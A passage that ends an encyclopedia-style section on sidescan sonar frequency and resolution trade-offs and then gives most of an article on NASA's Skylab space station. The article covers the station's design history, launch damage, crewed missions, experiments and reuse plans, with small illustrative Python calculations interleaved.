Another source lists ranges and resolutions vs. frequencies for sidescan sonars: 30 kHz provides low resolution with a range of 1000–6000 m, 100 kHz gives medium resolution at 500–1000 m, 300 kHz gives high resolution at 150–500 m, and 600 kHz gives high resolution at 75–150 m. Longer-range sonars are more adversely affected by nonhomogeneities of water. Some environments, typically shallow waters near the coasts, have complicated terrain with many features; higher frequencies become necessary there.
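The trade-offs described above follow from basic wave behavior: a transducer of aperture D can form a beam no narrower than roughly one wavelength divided by D, so lower frequencies need larger arrays, and because resolution is angular, cross-range resolution degrades with distance. A rough Python sketch under this diffraction-limit assumption (the 0.5 m aperture and the example ranges are illustrative, not taken from the text):

SOUND_SPEED = 1500.0  # m/s, nominal value for seawater

def wavelength(freq_hz):
    return SOUND_SPEED / freq_hz

def beamwidth_rad(freq_hz, aperture_m):
    # Rough diffraction limit for an array: about lambda / D radians.
    return wavelength(freq_hz) / aperture_m

def cross_range_resolution(freq_hz, aperture_m, range_m):
    # Angular beams widen with distance, so cross-range resolution
    # degrades linearly with range.
    return range_m * beamwidth_rad(freq_hz, aperture_m)

# A 0.5 m transducer at 30 kHz vs 600 kHz, near the quoted ranges:
for freq, rng in [(30e3, 3000.0), (600e3, 100.0)]:
    res = cross_range_resolution(freq, 0.5, rng)
    print(f"{freq/1e3:.0f} kHz at {rng:.0f} m: ~{res:.1f} m across-track")

The low frequency reaches kilometres but resolves only hundreds of metres across-track, while the high frequency resolves well under a metre at its much shorter working range, consistent with the sidescan figures above.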
Technology
Navigation
null
29441
https://en.wikipedia.org/wiki/Skylab
Skylab
Skylab was the United States' first space station, launched by NASA and occupied for about 24 weeks between May 1973 and February 1974. It was operated by three separate three-astronaut crews: Skylab 2, Skylab 3, and Skylab 4. Operations included an orbital workshop, a solar observatory, Earth observation, and hundreds of experiments. Skylab's orbit eventually decayed, and it disintegrated in the atmosphere on July 11, 1979, scattering debris across the Indian Ocean and Western Australia. Overview Skylab was the only space station operated exclusively by the United States. A permanent station was planned starting in 1988, but its funding was canceled and U.S. participation shifted to the International Space Station in 1993. Skylab had a mass of with an Apollo command and service module (CSM) attached and included a workshop, a solar observatory, and several hundred life science and physical science experiments. It was launched uncrewed into low Earth orbit by a Saturn V rocket modified to be similar to the Saturn INT-21, with the S-IVB third stage not available for propulsion because the orbital workshop was built out of it. This was the final flight for the rocket, which was more commonly known for carrying the crewed Apollo Moon landing missions. Configuration Skylab included the Apollo Telescope Mount (a multi-spectral solar observatory), a multiple docking adapter with two docking ports, an airlock module with extravehicular activity (EVA) hatches, and the orbital workshop, the main habitable space inside Skylab. Electrical power came from solar arrays and from fuel cells in the docked Apollo CSM. The rear of the station included a large waste tank, propellant tanks for maneuvering jets, and a heat radiator. Astronauts conducted numerous experiments aboard Skylab during its operational life. Operations For the final two crewed missions to Skylab, NASA assembled a backup Apollo CSM/Saturn IB in case an in-orbit rescue mission was needed, but this vehicle was never flown. The station was damaged during launch when the micrometeoroid shield tore away from the workshop, taking one of the main solar panel arrays with it and jamming the other main array. This deprived Skylab of most of its electrical power and also removed protection from intense solar heating, threatening to make it unusable. The first crew deployed a replacement heat shade and freed the jammed solar panels to save Skylab. This was the first time that a repair of this magnitude was performed in space. The Apollo Telescope Mount significantly advanced solar science, and its observation of the Sun was unprecedented. Astronauts took thousands of photographs of Earth, and the Earth Resources Experiment Package (EREP) viewed Earth with sensors that recorded data in the visible, infrared, and microwave spectral regions. The record for human time spent in orbit was extended beyond the 23 days set by the Soyuz 11 crew aboard Salyut 1 to 84 days by the Skylab 4 crew. Later plans to reuse Skylab were stymied by delays in the development of the Space Shuttle, and Skylab's decaying orbit could not be stopped. Skylab's atmospheric reentry began on July 11, 1979, amid worldwide media attention. Before re-entry, NASA ground controllers tried to adjust Skylab's orbit to minimize the risk of debris landing in populated areas, targeting the south Indian Ocean, which was partially successful.
Debris showered Western Australia, and recovered pieces indicated that the station had disintegrated lower than expected. As the Skylab program drew to a close, NASA's focus had shifted to the development of the Space Shuttle. NASA space station and laboratory projects included Spacelab, Shuttle-Mir, and Space Station Freedom, which was merged into the International Space Station. Background Rocket engineer Wernher von Braun, science fiction writer Arthur C. Clarke, and other early advocates of crewed space travel expected until the 1960s that a space station would be an important early step in space exploration. Von Braun participated in the publishing of a series of influential articles in Collier's magazine from 1952 to 1954, titled "Man Will Conquer Space Soon!". He envisioned a large, circular station in diameter that would rotate to generate artificial gravity and require a fleet of space shuttles for construction in orbit. The 80 men aboard the station would include astronomers operating a telescope, meteorologists to forecast the weather, and soldiers to conduct surveillance. Von Braun expected that future expeditions to the Moon and Mars would leave from the station. The development of the transistor, the solar cell, and telemetry led in the 1950s and early 1960s to uncrewed satellites that could take photographs of weather patterns or enemy nuclear weapons and send them to Earth. A large station was no longer necessary for such purposes, and the United States Apollo program to send men to the Moon chose a mission mode that would not need in-orbit assembly. A smaller station that a single rocket could launch retained value, however, for scientific purposes. Early studies In 1959, von Braun, head of the Development Operations Division at the Army Ballistic Missile Agency, submitted his final Project Horizon plans to the U.S. Army. The overall goal of Horizon was to place men on the Moon, a mission that would soon be taken over by the rapidly forming NASA. Although concentrating on the Moon missions, von Braun also detailed an orbiting laboratory built out of a Horizon upper stage, an idea used for Skylab. A number of NASA centers studied various space station designs in the early 1960s. Studies generally looked at platforms launched by the Saturn V, followed up by crews launched on the Saturn IB using an Apollo command and service module, or a Gemini capsule on a Titan II-C, the latter being much less expensive where cargo was not needed. Proposals ranged from an Apollo-based station with two to three men, or a small "canister" for four men with Gemini capsules resupplying it, to a large, rotating station with 24 men and an operating lifetime of about five years. A proposal to study the use of a Saturn S-IVB as a crewed space laboratory was documented in 1962 by the Douglas Aircraft Company. Air Force plans The Department of Defense (DoD) and NASA cooperated closely in many areas of space. In September 1963, NASA and the DoD agreed to cooperate in building a space station. The DoD wanted its own crewed facility, however, and in December 1963 it announced the Manned Orbiting Laboratory (MOL), a small space station primarily intended for photo reconnaissance using large telescopes directed by a two-person crew. The station was the same diameter as a Titan II upper stage and would be launched with the crew riding atop in a modified Gemini capsule with a hatch cut into the heat shield on the bottom of the capsule.
MOL competed for funding with a NASA station for the next five years, and politicians and other officials often suggested that NASA participate in MOL or use the DoD design. The military project led to changes to the NASA plans so that they would resemble MOL less. Development Apollo Applications Program NASA management was concerned about losing the 400,000 workers involved in Apollo after landing on the Moon in 1969. A reason von Braun, head of NASA's Marshall Space Flight Center during the 1960s, advocated a smaller station after his large one was not built was that he wished to provide his employees with work beyond developing the Saturn rockets, which would be completed relatively early during Project Apollo. NASA set up the Apollo Logistic Support System Office, originally intended to study various ways to modify the Apollo hardware for scientific missions. The office initially proposed a number of projects for direct scientific study, including an extended-stay lunar mission which required two Saturn V launchers, a "lunar truck" based on the Lunar Module (LM), a large, crewed solar telescope using an LM as its crew quarters, and small space stations using a variety of LM- or CSM-based hardware. Although it did not look at the space station specifically, over the next two years the office would become increasingly dedicated to this role. In August 1965, the office was renamed, becoming the Apollo Applications Program (AAP). As part of their general work, in August 1964 the Manned Spacecraft Center (MSC) presented studies on an expendable lab known as Apollo X, short for Apollo Extension System. Apollo X would have replaced the LM carried on the top of the S-IVB stage with a small space station slightly larger than the CSM's service area, containing supplies and experiments for missions between 15 and 45 days' duration. Using this study as a baseline, a number of different mission profiles were looked at over the next six months. Wet workshop In November 1964, von Braun proposed a more ambitious plan for a much larger station built from the S-II second stage of a Saturn V. His design replaced the S-IVB third stage with an aeroshell, primarily as an adapter for the CSM on top. Inside the shell was a cylindrical equipment section. On reaching orbit, the S-II second stage would be vented to remove any remaining hydrogen fuel, then the equipment section would be slid into it via a large inspection hatch. This became known as a "wet workshop" concept, because of the conversion of an active fuel tank. The station filled the entire interior of the S-II stage's hydrogen tank, with the equipment section forming a "spine" and living quarters located between it and the walls of the booster. This would have resulted in a very large living area. Power was to be provided by solar cells lining the outside of the S-II stage. One problem with this proposal was that it required a dedicated Saturn V launch to fly the station. At the time the design was being proposed, it was not known how many of the then-contracted Saturn Vs would be required to achieve a successful Moon landing. However, several planned Earth-orbit test missions for the LM and CSM had been canceled, leaving a number of Saturn IBs free for use. Further work led to the idea of building a smaller "wet workshop" based on the S-IVB, launched as the second stage of a Saturn IB. A number of S-IVB-based stations were studied at MSC from mid-1965, and these had much in common with the Skylab design that eventually flew.
An airlock would be attached to the hydrogen tank, in the area designed to hold the LM, and a minimum amount of equipment would be installed in the tank itself in order to avoid taking up too much fuel volume. Floors of the station would be made from an open metal framework that allowed the fuel to flow through it. After launch, a follow-up mission launched by a Saturn IB would deliver additional equipment, including solar panels, an equipment section and docking adapter, and various experiments. Douglas Aircraft Company, builder of the S-IVB stage, was asked to prepare proposals along these lines. The company had for several years been proposing stations based on the S-IV stage, before it was replaced by the S-IVB. On April 1, 1966, MSC sent out contracts to Douglas, Grumman, and McDonnell for the conversion of a spent S-IVB stage, under the name Saturn S-IVB spent-stage experiment support module (SSESM). In May 1966, astronauts voiced concerns over the purging of the stage's hydrogen tank in space. Nevertheless, in late July 1966, it was announced that the Orbital Workshop would be launched as a part of Apollo mission AS-209, originally one of the Earth-orbit CSM test launches, followed by two Saturn I/CSM crew launches, AAP-1 and AAP-2. The Manned Orbiting Laboratory (MOL) remained AAP's chief competitor for funds, although the two programs cooperated on technology. NASA considered flying experiments on MOL or using its Titan IIIC booster instead of the much more expensive Saturn IB. The agency decided that the Air Force station was not large enough and that converting Apollo hardware for use with the Titan would be too slow and too expensive. The DoD later canceled MOL in June 1969. Dry workshop Design work continued over the next two years, in an era of shrinking budgets. (NASA sought US$450 million for Apollo Applications in fiscal year 1967, for example, but received US$42 million.) In August 1967, the agency announced that the lunar mapping and base construction missions examined by the AAP were being canceled. Only the Earth-orbiting missions remained, namely the Orbital Workshop and the Apollo Telescope Mount solar observatory. The success of Apollo 8 in December 1968, launched on the third flight of a Saturn V, made it likely that one would be available to launch a dry workshop. Later, several Moon missions were canceled as well, originally to be Apollo missions 18 through 20. The cancellation of these missions freed up three Saturn V boosters for the AAP program. Although this would have allowed the development of von Braun's original S-II-based mission, by this time so much work had been done on the S-IVB-based design that work continued on that baseline. With the extra power available, the wet workshop was no longer needed; the S-IC and S-II lower stages could launch a "dry workshop", with its interior already prepared, directly into orbit. Habitability A dry workshop simplified plans for the interior of the station. Industrial design firm Raymond Loewy/William Snaith recommended emphasizing habitability and comfort for the astronauts by providing a wardroom for meals and relaxation and a window to view Earth and space, although astronauts were dubious about the designers' focus on details such as color schemes. Habitability had not previously been an area of concern when building spacecraft, due to their small size and brief mission durations, but the Skylab missions would last for months.
NASA sent a scientist on Jacques Piccard's Ben Franklin submarine in the Gulf Stream in July and August 1969 to learn how six people would live in an enclosed space for four weeks. Astronauts were uninterested in watching movies on a proposed entertainment center or in playing games, but they did want books and individual music choices. Food was also important; early Apollo crews complained about its quality, and a NASA volunteer found it intolerable to live on the Apollo food for four days on Earth. Its taste and its composition, in the form of cubes and squeeze tubes, were unpleasant. Skylab food significantly improved on its predecessors by prioritizing palatability over scientific needs. For sleeping in space, each astronaut had a private area the size of a small walk-in closet, with a curtain, sleeping bag, and locker. Designers also added a shower and a toilet, both for comfort and to obtain precise urine and feces samples for examination on Earth. The waste samples were so important that they would have been priorities in any rescue mission. Skylab did not have recycling systems such as the conversion of urine to drinking water; nor did it dispose of waste by dumping it into space. The S-IVB's liquid oxygen tank below the Orbital Workshop was used to store trash and wastewater, passed through an airlock. Operational history Completion and launch On August 8, 1969, the McDonnell Douglas Corporation received a contract for the conversion of two existing S-IVB stages to the Orbital Workshop configuration. One of the S-IV test stages was shipped to McDonnell Douglas for the construction of a mock-up in January 1970. The Orbital Workshop was renamed "Skylab" in February 1970 as a result of a NASA contest. The actual stage that flew was the upper stage of the AS-212 rocket (the S-IVB stage, S-IVB 212). The mission computer used aboard Skylab was the IBM System/4Pi TC-1, a relative of the AP-101 Space Shuttle computers. The Saturn V with serial number SA-513, originally produced for the Apollo program – before the cancellation of Apollo 18, 19, and 20 – was repurposed and redesigned to launch Skylab. The Saturn V's third stage was removed and replaced with Skylab, with the controlling Instrument Unit remaining in its standard position. Skylab was launched on May 14, 1973, by the modified Saturn V. The launch is sometimes referred to as Skylab 1. Severe damage was sustained during launch and deployment, including the loss of the station's micrometeoroid shield/sun shade and one of its main solar panels. Debris from the lost micrometeoroid shield further complicated matters by becoming tangled in the remaining solar panel, preventing its full deployment and thus leaving the station with a huge power deficit. Immediately following Skylab's launch, Pad 39A at Kennedy Space Center was deactivated, and construction proceeded to modify it for the Space Shuttle program, originally targeting a maiden launch in March 1979. The crewed missions to Skylab would occur using a Saturn IB rocket from Launch Pad 39B. Skylab 1 was the last uncrewed launch from LC-39A until February 19, 2017, when SpaceX CRS-10 was launched from there. Crewed missions Three crewed missions, designated Skylab 2, Skylab 3, and Skylab 4, were made to Skylab in Apollo command and service modules. The first crewed mission, Skylab 2, launched on May 25, 1973, atop a Saturn IB and involved extensive repairs to the station.
The crew deployed a parasol-like sunshade through a small instrument port from the inside of the station, bringing station temperatures down to acceptable levels and preventing overheating that would have melted the plastic insulation inside the station and released poisonous gases. This solution was designed by Jack Kinzler, who won the NASA Distinguished Service Medal for his efforts. The crew conducted further repairs via two spacewalks (extravehicular activity, or EVA). The crew stayed in orbit with Skylab for 28 days. Two additional missions followed, with launch dates of July 28, 1973 (Skylab 3), and November 16, 1973 (Skylab 4), and mission durations of 59 and 84 days, respectively. The last Skylab crew returned to Earth on February 8, 1974. In addition to the three crewed missions, there was a rescue mission on standby that had a crew of two but could take five back down. Skylab 2: launched May 25, 1973 Skylab 3: launched July 28, 1973 Skylab 4: launched November 16, 1973 Skylab 5: cancelled Skylab Rescue: on standby Also of note was the three-man crew of the Skylab Medical Experiment Altitude Test (SMEAT), who spent 56 days in 1972 at low pressure on Earth to evaluate medical experiment equipment. This was a spaceflight analog test in full gravity, but Skylab hardware was tested and medical knowledge was gained. Orbital operations Originally intended to be visited by one 28-day and two 56-day missions for a total of 140 days, Skylab was ultimately occupied for 171 days and 13 hours during its three crewed expeditions, orbiting the Earth 2,476 times. Each of these missions extended the record for human time spent in space, which had stood at the 23 days set by the Soviet Soyuz 11 crew aboard the space station Salyut 1 on June 30, 1971. Skylab 2 lasted 28 days, Skylab 3 56 days, and Skylab 4 84 days. Astronauts performed ten spacewalks, totaling 42 hours and 16 minutes. Skylab logged about 2,000 hours of scientific and medical experiments, 127,000 frames of film of the Sun and 46,000 of Earth. Solar experiments included photographs of eight solar flares and produced valuable results that scientists stated would have been impossible to obtain with uncrewed spacecraft. The existence of the Sun's coronal holes was confirmed because of these efforts. Many of the experiments conducted investigated the astronauts' adaptation to extended periods of microgravity. A typical day began at 6 a.m. Central Time Zone. Although the toilet was small and noisy, both veteran astronauts, who had endured earlier missions' rudimentary waste-collection systems, and rookies complimented it. The first crew enjoyed taking a shower once a week, but found drying themselves in weightlessness and vacuuming excess water difficult; later crews usually cleaned themselves daily with wet washcloths instead of using the shower. Astronauts also found that bending over in weightlessness to put on socks or tie shoelaces strained their abdominal muscles. Breakfast began at 7 a.m. Astronauts usually stood to eat, as sitting in microgravity also strained their abdominal muscles. They reported that their food, although greatly improved from Apollo, was bland and repetitive, and weightlessness caused utensils, food containers, and bits of food to float away; also, gas in their drinking water contributed to flatulence.
After breakfast and preparation for lunch, experiments, tests and repairs of spacecraft systems and, if possible, 90 minutes of physical exercise followed; the station had a bicycle and other equipment, and astronauts could jog around the water tank. After dinner, which was scheduled for 6 p.m., crews performed household chores and prepared for the next day's experiments. Following the lengthy daily instructions (some of which were up to 15 meters long) sent via teleprinter, the crews were often busy enough to postpone sleep. The station offered what a later study called "a highly satisfactory living and working environment for crews", with enough room for personal privacy. Although it had a dart set, playing cards, and other recreational equipment in addition to books and music players, the window with its view of Earth became the most popular way to relax in orbit. Experiments Prior to departure, about 80 experiments were named, although they are also described as "almost 300 separate investigations". Experiments were divided into six broad categories: Life science – human physiology, biomedical research; circadian rhythms (mice, gnats) Solar physics and astronomy – Sun observations (eight telescopes and separate instrumentation); Comet Kohoutek (Skylab 4); stellar observations; space physics Earth resources – mineral resources; geology; hurricanes; land and vegetation patterns Material science – welding, brazing, metal melting; crystal growth; water / fluid dynamics Student research – 19 different student proposals. Several experiments were commended by the crew, including a dexterity experiment and a test of web-spinning by spiders in low gravity. Other – human adaptability, ability to work, dexterity; habitat design/operations. Because the solar scientific airlock – one of two research airlocks – was unexpectedly occupied by the "parasol" that replaced the missing meteorite shield, a few experiments were instead installed outside with the telescopes during spacewalks or shifted to the Earth-facing scientific airlock. Skylab 2 spent less time than planned on most experiments due to station repairs. On the other hand, Skylab 3 and Skylab 4 far exceeded the initial experiment plans, once the crews adjusted to the environment and established comfortable working relationships with ground control. Skylab 4 carried out several more experiments, such as observations of Comet Kohoutek. Astronaut maneuvering equipment As a technology demonstration, the crew practiced flying the Automatically Stabilized Maneuvering Unit (ASMU) inside the spacious dome of the Orbital Workshop. It was designed to enable astronauts to perform untethered movement in microgravity. The ASMU tests established key piloting characteristics and a capability base for the MMU systems used on Space Shuttle missions. Nobel Prize Riccardo Giacconi shared the 2002 Nobel Prize in Physics for his study of X-ray astronomy, including the study of emissions from the Sun carried out onboard Skylab, contributing to the birth of X-ray astronomy. Film vaults and window radiation shield Skylab had certain features to protect vulnerable technology from radiation. The window was vulnerable to darkening, and this darkening could affect experiment S190. As a result, a light shield that could be opened or shut was designed and installed on Skylab. To protect a wide variety of films, used for a variety of experiments and for astronaut photography, there were five film vaults.
There were four smaller film vaults in the Multiple Docking Adapter, mainly because the structure could not carry enough weight for a single larger film vault. The orbital workshop could handle a single larger vault, which was also more efficient for shielding. A later example of a radiation vault is the Juno Radiation Vault for the Juno Jupiter orbiter, launched in 2011, which was designed to protect much of the uncrewed spacecraft's electronics, using 1 cm thick walls of titanium. The large vault in the orbital workshop had an empty mass of . The four smaller vaults had a combined mass of . The primary construction material of all five vaults was aluminum. When Skylab re-entered, one recovered chunk of aluminum was thought to be a door from one of the film vaults. The large film vault was one of the heaviest single pieces of Skylab to re-enter Earth's atmosphere. The Skylab film vaults were used for storing film from various sources, including the Apollo Telescope Mount solar instruments. Six ATM experiments used film to record data, and over the course of the missions more than 150,000 successful exposures were recorded. The film canisters had to be manually retrieved during crewed spacewalks to the instruments during the missions. The film canisters were returned to Earth aboard the Apollo capsules when each mission ended, and were among the heaviest items that had to be returned at the end of each mission. The heaviest canisters weighed 40 kg and could hold up to 16,000 frames of film. Gyroscopes There were two types of gyroscopes on Skylab. Control-moment gyroscopes (CMGs) could physically move the station, and rate gyroscopes measured its rate of rotation to find its orientation. The CMGs helped provide the fine pointing needed by the Apollo Telescope Mount and resisted various forces that could change the station's orientation. Some of the forces acting on Skylab that the pointing system needed to resist: Gravity gradient Aerodynamic disturbance Internal movements of crew. Skylab was the first large spacecraft to use big gyroscopes capable of controlling its attitude. The control could also be used to help point the instruments. The gyroscopes took about ten hours to spin up if they had been turned off. There was also a thruster system to control Skylab's attitude. There were nine rate-gyroscope sensors, three for each axis; they fed their output to the Skylab digital computer. Two of the three per axis were active and their input was averaged, while the third was a backup. From NASA SP-400 Skylab, Our First Space Station: "each Skylab control-moment gyroscope consisted of a motor-driven rotor, electronics assembly, and power inverter assembly. The rotor weighed and rotated at approximately 8950 revolutions per minute". There were three control-moment gyroscopes on Skylab, but only two were required to maintain pointing. The control and sensor gyroscopes were part of a system that helped detect and control the orientation of the station in space. Other sensors that helped with this were a Sun tracker and a star tracker. The sensors fed data to the main computer, which could then use the control gyroscopes and/or the thruster system to keep Skylab pointed as desired. Shower Skylab had a zero-gravity shower system in the work and experiment section of the Orbital Workshop, designed and built at the Manned Spacecraft Center. It had a cylindrical curtain that went from floor to ceiling and a vacuum system to suck away water. The floor of the shower had foot restraints.
To bathe, the user coupled a pressurized bottle of warmed water to the shower's plumbing, then stepped inside and secured the curtain. A push-button shower nozzle was connected by a stiff hose to the top of the shower. The system was designed for about 6 pints (2.8 liters) of water per shower, the water being drawn from the personal hygiene water tank. The use of both the liquid soap and the water was carefully planned out, with enough soap and warm water for one shower per week per person. The first astronaut to use the space shower was Paul J. Weitz on Skylab 2, the first crewed mission. He said, "It took a fair amount longer to use than you might expect, but you come out smelling good". A Skylab shower took about two and a half hours, including the time to set up the shower and dissipate the used water. The procedure for operating the shower was as follows: Fill up the pressurized water bottle with hot water and attach it to the ceiling Connect the hose and pull up the shower curtain Spray down with water Apply liquid soap and spray more water to rinse Vacuum up all the fluids and stow items. One of the big concerns with bathing in space was control of water droplets, so that they did not cause an electrical short by floating into the wrong area. The vacuum water system was thus integral to the shower. The vacuum fed to a centrifugal separator, filter, and collection bag to allow the system to vacuum up the fluids. Waste water was injected into a disposal bag, which was in turn put in the waste tank. The material for the shower enclosure was fire-proof beta cloth wrapped around hoops of diameter; the top hoop was connected to the ceiling. The shower could be collapsed to the floor when not in use. Skylab also supplied astronauts with rayon terrycloth towels, which had color-coded stitching for each crew member. There were 420 towels on board Skylab initially. Cameras and film There was a variety of hand-held and fixed experiments that used various types of film. In addition to the instruments in the ATM solar observatory, 35 and 70 mm film cameras were carried on board. An analog TV camera was carried that recorded video electronically; these electronic signals could be recorded to magnetic tape or transmitted to Earth by radio signal. It was determined that film would fog due to radiation over the course of the mission. To prevent this, film was stored in the vaults. Personal (hand-held) camera equipment: Television camera Westinghouse color 25–150 mm zoom 16 mm film camera (Maurer), called the 16 mm Data Acquisition Camera. The DAC was capable of very low frame rates, such as for engineering data films, and it had independent shutter speeds. It could be powered from a battery or from Skylab itself. It used interchangeable lenses, and various lens and film types were used during the missions. There were different options for frame rates: 2, 4, 6, 12 and 24 frames per second Lenses available: 5, 10, 18, 25, 75, and 100 mm Films used: Ektachrome film SO-368 film SO-168 film Film for the DAC was contained in DAC film magazines, which held up to 140 feet (42.7 m) of film. At 24 frames per second this was enough for 4 minutes of filming, with progressively longer filming times at lower frame rates, such as 16 minutes at 6 frames per second. The film had to be loaded or unloaded from the DAC in a photographic darkroom.
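The magazine run times quoted above can be checked with a short calculation; a minimal Python sketch, assuming the standard 16 mm film pitch of 40 frames per foot (a figure not given in the text):

FRAMES_PER_FOOT_16MM = 40  # standard 16 mm pitch; assumed, not from the text

def filming_time_minutes(film_feet, frames_per_second):
    # Run time of a magazine: total frames divided by the frame rate.
    total_frames = film_feet * FRAMES_PER_FOOT_16MM
    return total_frames / frames_per_second / 60.0

# A full 140 ft DAC magazine at each selectable frame rate:
for fps in (2, 4, 6, 12, 24):
    print(f"{fps:>2} fps: {filming_time_minutes(140, fps):5.1f} min")
# 24 fps gives about 3.9 minutes and 6 fps about 15.6, matching the
# "4 minutes" and "16 minutes" figures quoted above.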
35 mm film cameras (Nikon) There were five Nikon 35 mm film cameras on board, with 55 mm and 300 mm lenses. They were specially modified Nikon F cameras with interchangeable lenses. 35 mm films included: Ektachrome SO-368 SO-168 2485 type film 2443 type film 70 mm film camera (Hasselblad) This had an electric data camera system with a Reseau plate Films included 70 mm Ektachrome SO-368 film Lenses: 70 mm lens, 100 mm lens. Experiment S190B was the Actron Earth Terrain Camera. The S190A was the Multispectral Photographic Camera: This consisted of six Itek 70 mm boresighted cameras Lenses were f/2.8 with a 21.2° field of view. There was also a Polaroid SX-70 instant camera, and a pair of Leitz Trinovid 10 × 40 binoculars modified for use in space to aid in Earth observations. The SX-70 was used to take pictures of the Extreme Ultraviolet monitor by Dr. Garriott, as the monitor provided a live video feed of the solar corona in ultraviolet light as observed by the Skylab solar observatory instruments located in the Apollo Telescope Mount. Computers Skylab was controlled in part by a digital computer system, and one of its main jobs was to control the pointing of the station; pointing was especially important for its solar power collection and observatory functions. The computer consisted of two actual computers, a primary and a secondary, of the same design. The system ran several thousand words of code, which was also backed up on the Memory Load Unit (MLU). The two computers were linked to each other and to various input and output items by the workshop computer interface. Operations could be switched from the primary to the backup either automatically if errors were detected, by the Skylab crew, or from the ground. The Skylab computer was a space-hardened and customized version of the TC-1 computer, a version of the IBM System/4Pi, itself based on the IBM System/360. The TC-1 had a 16,000-word memory based on ferrite memory cores, while the MLU was a read-only tape drive that contained a backup of the main computer programs. The tape drive would take 11 seconds to upload the backup of the software program to a main computer. The TC-1 used 16-bit words, and the central processor came from the 4Pi computer. There was a 16k and an 8k version of the software program. The computer had a mass of 100 pounds (45.4 kg) and consumed about ten percent of the station's electrical power. Apollo Telescope Mount Digital Computer Attitude and Pointing Control System (APCS) Memory Load Unit (MLU). After launch, the computer was what the controllers on the ground communicated with to control the station's orientation. When the sun shield was torn off, the ground staff had to balance solar heating against electrical production. On March 6, 1978, the computer system was re-activated by NASA to control the re-entry. The system had a user interface that consisted of a display, ten buttons, and a three-position switch. Because the numbers were in octal (base 8), it only had the digits zero to seven (8 keys), and the other two keys were enter and clear. The display could show minutes and seconds, which would count down to orbital benchmarks, or it could display keystrokes when using the interface. The interface could be used to change the software program. The user interface was called the Digital Address System (DAS) and could send commands to the computer's command system. The command system could also receive commands from the ground.
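As a toy illustration of the base-8 convention described above, the following Python sketch shows how values would be rendered for, and entered on, an eight-digit keypad like the DAS's; the function names are invented for illustration and do not reflect the actual flight software:

def to_octal_display(value):
    # Render an integer as the octal digit string a base-8 display shows.
    return format(value, "o")

def from_octal_keys(keys):
    # Interpret a sequence of 0-7 keypresses as an octal number.
    if any(k < 0 or k > 7 for k in keys):
        raise ValueError("a base-8 keypad has only digits 0-7")
    value = 0
    for k in keys:
        value = value * 8 + k
    return value

print(to_octal_display(493))       # -> '755'
print(from_octal_keys([7, 5, 5]))  # -> 493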
For personal computing needs, Skylab crews were equipped with the then-new hand-held electronic scientific calculator, which was used as the primary personal computing aid in place of the slide rules used on prior space missions. The model used was the Hewlett-Packard HP-35. Some slide rules continued in use aboard Skylab, and a circular slide rule was at the workstation. Plans for re-use after the last mission After nearly 172 days, Skylab had considerably exceeded its planned 140 days of habitation. The station had held up relatively well, but its onboard supplies were low and its systems were beginning to degrade. One of the three control-moment gyroscopes (CMGs) failed 8 days into Skylab 4, and by the end of the mission another was showing signs of impending failure. With just a single CMG, Skylab would be unable to control its attitude, and it was not possible to repair or replace the broken gyroscopes on orbit. Virtually all of the prepackaged food launched with the station had been consumed; Skylab 4's mission extension from 56 to 84 days had required the crew to take an extra 28 days' worth of food with them. There was still enough water to support three men for 60 days, and enough oxygen and nitrogen to support the same for 140 days. A fourth crewed mission using an Apollo CSM was considered, which would have used the launch vehicle kept on standby for the Skylab Rescue mission. This would have been a 20-day mission to boost Skylab to a higher altitude and conduct more scientific experiments. Another plan was to use a Teleoperator Retrieval System (TRS), launched aboard the Space Shuttle (then under development), to robotically re-boost the orbit. When Skylab 5 was cancelled, it was expected Skylab would stay in orbit until the 1980s, enough time to overlap with the beginning of Shuttle launches. Other options for launching the TRS included the Titan III and Atlas-Agena. No option received the level of effort and funding needed for execution before Skylab's sooner-than-expected re-entry. The Skylab 4 crew left a bag filled with supplies to welcome visitors, and left the hatch unlocked. Skylab's internal systems were evaluated and tested from the ground, and effort was put into plans for re-using it as late as 1978. NASA discouraged any discussion of additional visits due to the station's age, but in 1977 and 1978, when the agency still believed the Space Shuttle would be ready by 1979, it completed two studies on reusing the station. By September 1978, the agency believed Skylab was safe for crews, with all major systems intact and operational. It still had 180 man-days of water and 420 man-days of oxygen, and astronauts could refill both; the station could hold up to about 600 to 700 man-days of drinkable water and 420 man-days of food. Before Skylab 4 left, the crew performed one more boost, running the Skylab thrusters for 3 minutes, which added 11 km in height to its orbit; Skylab was left in a 433 by 455 km orbit on departure. At this time, the NASA-accepted estimate for its re-entry was nine years. The studies cited several benefits from reusing Skylab, which one called a resource worth "hundreds of millions of dollars" with "unique habitability provisions for long duration space flight". Because no more operational Saturn V rockets were available after the Apollo program, four to five shuttle flights and extensive space architecture would have been needed to build another station with Skylab's volume.
Its ample size – much greater than that of the shuttle alone, or even the shuttle plus Spacelab – was enough, with some modifications, for up to seven astronauts of both sexes, and for experiments needing a long duration in space; even a movie projector for recreation was possible. Proponents of Skylab's reuse also said repairing and upgrading Skylab would provide information on the results of long-duration exposure to space for future stations. The most serious issue for reactivation was attitude control, as one of the station's gyroscopes had failed and the attitude control system needed refueling; these issues would require EVAs to fix. The station had not been designed for extensive resupply. However, although it was originally planned that Skylab crews would only perform limited maintenance, they successfully made major repairs during EVA, such as the Skylab 2 crew's deployment of the solar panel and the Skylab 4 crew's repair of the primary coolant loop. The Skylab 2 crew fixed one item during EVA by, reportedly, "hit[ting] it with [a] hammer". Some studies also said that, beyond the opportunity for space construction and maintenance experience, reactivating the station would free up shuttle flights for other uses and reduce the need to modify the shuttle for long-duration missions. Even if the station were not crewed again, went one argument, it might serve as an experimental platform. Shuttle mission plans The reactivation would likely have occurred in four phases: An early Space Shuttle flight would have boosted Skylab to a higher orbit, adding five years of operational life. The shuttle might have pushed or towed the station, but attaching a space tug – the Teleoperator Retrieval System (TRS) – to the station would have been more likely, based on astronauts' training for the task. Martin Marietta won the US$26 million contract to design the apparatus. The TRS would contain about three tons of propellant. The remote-controlled booster had TV cameras and was designed for duties such as space construction and servicing and retrieving satellites the shuttle could not reach. After rescuing Skylab, the TRS would have remained in orbit for future use. Alternatively, it could have been used to de-orbit Skylab for a safe, controlled re-entry and destruction. In two shuttle flights, Skylab would have been refurbished. In January 1982, the first mission would have attached a docking adapter and conducted repairs. In August 1983, a second crew would have replaced several system components. In March 1984, shuttle crews would have attached a solar-powered Power Expansion Package, refurbished scientific equipment, and conducted 30- to 90-day missions using the Apollo Telescope Mount and the Earth resources experiments. Over five years, Skylab would have been expanded to accommodate six to eight astronauts, with a new large docking/interface module, additional logistics modules, Spacelab modules and pallets, and an orbital vehicle space dock using the shuttle's external tank. The first three phases would have required about US$60 million in 1980s dollars, not including launch costs. After departure After a final boost by Skylab 4's Apollo CSM before its departure in 1974, Skylab was left in a parking orbit of 433 